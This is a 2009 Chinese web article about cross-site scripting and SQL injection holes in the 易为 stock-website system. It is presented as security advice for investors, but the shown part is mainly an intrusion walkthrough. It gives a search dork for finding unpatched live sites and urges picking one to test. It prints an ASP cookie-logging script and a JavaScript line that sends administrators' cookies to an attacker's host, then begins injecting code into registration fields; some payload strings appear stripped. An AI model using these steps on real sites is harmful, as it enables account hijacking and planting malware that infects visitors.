加入收藏·设为首页·会员中心·我要投稿·RSS
您当前的位置:首页?>?电子商务?>?支付安全

80%股票网站危及钱袋

时间:2009-07-20 00:29:17????来源:网络??作者:happy88

?????? 短短几个月,股指从1600多点反弹到目前的2500左右,股市从“极度冰寒”转变成了“火热朝天”。这

段时间很多股民朋友赚钱了、开心了,但股票相关的安全形势却一天天严峻起来。

  从2月份以来,大量的股票诈骗网站不断冒出,“黑榜”连续几周都关注了此事、进行了道了,屏蔽了大

量股票诈骗网站。如果你觉得自己的安全意识比较好,不会上股票诈骗网站,可以安心炒股,这就有危险了

  为什么这么说呢?因为被大量网站使用的易为股票系统出现了严重的漏洞,其中一个漏洞可以用来挂马

,浏览网站的股民朋友就有可能中毒。如果中毒了,在进行交易时就有可能出现股票账户里面的现金不翼而

飞。

  以前的股票网站挂马都是不是股票系统出问题,所以影响范围不大,但现在是易为股票系统出问题了,

所有是有该系统的网站都可能被挂马,这不令人胆战心惊!那么,我们如何在险恶的网络环境中保护股票账

户的安全呢?

看了本文你会知道:

1. 如何避免浏览股票网站中毒
2. 怎么下载到没有病毒捆绑的股票软件
3. 识破股票诈骗网站的伪装

我们在百度中以“股票网站”为关键字进行搜索,在30个搜索出来的网站中,约有80%的网站使用了易为股票

系统,这个比例是相当的高了。目前网上有数百家使用该系统的股票网站。

  安全小百科:易为股票系统是一款股票网站的建站程序,使用该系统可以几步就建立一个股票网站。

  最近易为股票系统出现了严重的跨站及SQL注入漏洞,黑客通过漏洞可以轻易地获取使用该系统的网站中

所有的会员资料,并且能够以管理员权限进入到网站的后台,甚至可以在网页上挂马。网站被挂马后,用户

只要浏览网站即可能中毒。

  虽然一些特大型股票网站没有使用该系统,但数百家使用该系统的股票网站合起来的流量还是非常客观

的,拥有大量的用户,可以说很多股民朋友都身陷盗号的危险中。除了股票网站挂马,股票诈骗网站、捆绑

了病毒的股票软件都是股民朋友的需要注意的陷阱

股票系统出了两个漏洞

  作为一款知名的股票网站系统,出现如此严重的安全漏洞实在不应该,并且同时存在跨站漏洞和SQL注入

两个大漏洞。

  在易为股票系统中,有多处文本框没有进行字符过滤,尤其是其用户注册页面,例如“联系地址”和“

银行账号”,我们可以在其中输入? 这样的一句代码,当管理员浏览我

们的用户信息时,他的浏览器就会弹出“测试”的对话框。

  安全的网站系统是绝对不允许用户提交“”类似的危险代码的,而易为却丝毫没有对用户提交

的危险代码进行限制,因此产生了严重的跨站漏洞。这个漏洞可以被用来挂马。

  另一个严重的漏洞是SQL注入漏洞,问题出在网站的分栏浏览页面,同样是因为程序员的疏忽,没有对页

面中的变量进行过滤,从而导致了漏洞的发生,黑客可以通过特殊的语句猜解网站数据库中的内容,从而得

到重要的的资料,例如所以用户的的注册信息。

股票网站入侵揭秘

方法1:跨站挂马

  挂马流程:通过技术手段获取网站管理员的Cookie值→利用的Cookie值进行欺骗成功进入网站后台→在

后台寻找机会上传asp木马→利用asp木马修改网站文件→插入挂马代码。

第一步:寻找入侵目标

  我们在百度或Google中以“inurl:gp_nl.asp”为关键字进行搜索(图1),可以找到很多符合条件的网

站,由于漏洞是最近才被发现的,因此很多网站都还没来得及打上补丁,我们可以随便寻找一个进行测试。


  我们选择一个目标,它的Google的PR值为5(图2),网站排名系统Alexa中的平均排名在7万名左右(图3

),跟一些大型网站比起来小了点,但每天通过这套网站系统浏览网页的股民估计有数十万人次。

  安全小百科: PR是PageRank的简称,它是Google排名运算法则(排名公式)的一部分,用来标识网页的

等级和重要性。从1到10共分10个等级,其值越高,说明网站越受欢.

第二步:构建获取Cookie值的文件

  入侵第一步就是要获取网站管理员的Cookie值,因此我们需要构造一个获取管理员Cookie值的文件。新

建一个本文文件,输入如下内容:

<%
u=request("u")
co=request("co")
set fso=server.CreateObject("Scripting.FileSystemObject")
set txtfso=fso.OpenTextFile(server.mappath("ririri.txt"),8,True)
txtfso.WriteLine("[url="&u]url:"&u[/url])
txtfso.WriteLine("cookie:"&co)
txtfso.WriteLine("time:"&now())
txtfso.WriteLine("---------------")
txtfso.close
response.end
%>

  输入完毕后将文件保存为Cookie.asp。将其上传到自己的网站空间里,然后我们再新建一个文本文件,

输入:u="http://www.***.com/hack/Cookie.asp?u="+location.href+"&co="+document.cookie+"'";
document.write ("")

  其中www.***.com为网站空间的域名,将这个文件保存为hack.js,将它和Cookie.asp上传到同一目录中

第三步:插入跨站语句

  打开测试网站,在首页中点击“注册会员”按钮,在注册页面中填写基本的信息(图4),我们可以在其

中任意一个文本框中插入代码,可见程序的安全性非常的低。跨站的代码为:

">

文章标签:?相关文章
发表评论 共有 条评论
用户名: 密码:
验证码: ??匿名发表
精彩美文推荐
栏目更新
栏目热门